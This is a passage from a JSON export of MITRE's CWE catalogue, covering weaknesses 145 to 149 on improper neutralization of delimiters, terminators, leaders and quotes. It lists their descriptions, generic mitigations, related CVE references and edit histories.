Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Line Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Line Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"145":{"attr":{"@_ID":"145","@_Name":"Improper Neutralization of Section Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as section delimiters when they are sent to a downstream component.","Extended_Description":{"xhtml:p":["As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","One example of a section delimiter is the boundary string in a multipart MIME message. In many cases, doubled line delimiters can serve as a section delimiter."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"93","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that section delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Section Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Embedded Delimiters", Page 408"}}},"Notes":{"Note":{"#text":"Depending on the language and syntax being used, this could be the same as the record delimiter (CWE-143).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Section Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Section Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"146":{"attr":{"@_ID":"146","@_Name":"Improper Neutralization of Expression/Command Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as expression or command delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that inter-expression and inter-command delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Delimiter between Expressions or Commands"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"6"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Embedded Delimiters", Page 408"}}},"Notes":{"Note":{"#text":"A shell metacharacter (covered in CWE-150) is one example of a potential delimiter that may need to be neutralized.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Applicable_Platforms, Description, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Delimiter between Expressions or Commands","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Expression/Command Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"147":{"attr":{"@_ID":"147","@_Name":"Improper Neutralization of Input Terminators","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as input terminators when they are sent to a downstream component.","Extended_Description":"For example, a \\".\\" in SMTP signifies the end of mail message data, whereas a null character can be used for the end of a string.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that terminators will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0319","Description":"MFV. mail server does not properly identify terminator string to signify end of message, causing corruption, possibly in conjunction with off-by-one error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0319"},{"Reference":"CVE-2000-0320","Description":"MFV. mail server does not properly identify terminator string to signify end of message, causing corruption, possibly in conjunction with off-by-one error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0320"},{"Reference":"CVE-2001-0996","Description":"Mail server does not quote end-of-input terminator if it appears in the middle of a message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0996"},{"Reference":"CVE-2002-0001","Description":"Improperly terminated comment or phrase allows commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0001"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Input Terminator"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"460"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Input Terminator","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Input Terminator","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Input Terminators","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Input Terminators","attr":{"@_Date":"2010-04-05"}}]}},"148":{"attr":{"@_ID":"148","@_Name":"Improper Neutralization of Input Leaders","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not properly handle when a leading character or sequence (\\"leader\\") is missing or malformed, or if multiple leaders are used when only one should be allowed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that leading characters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Input Leader"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Input Leader","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Input Leader","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Input Leaders","attr":{"@_Date":"2010-06-21"}}]}},"149":{"attr":{"@_ID":"149","@_Name":"Improper Neutralization of Quoting Syntax","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Quotes injected into an application can be used to compromise a system. As data are parsed, an injected/absent/duplicate/malformed use of quotes may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that quotes will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0956","Description":"Database allows remote attackers to cause a denial of service (application crash) via a MATCH AGAINST query with an opening double quote but no closing double quote.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0956"},{"Reference":"CVE-2003-1016","Description":"MIE. MFV too? bypass AV/security with fields that should not be quoted, duplicate quotes, missing leading/trailing quotes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1016"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Quoting Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"468"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content 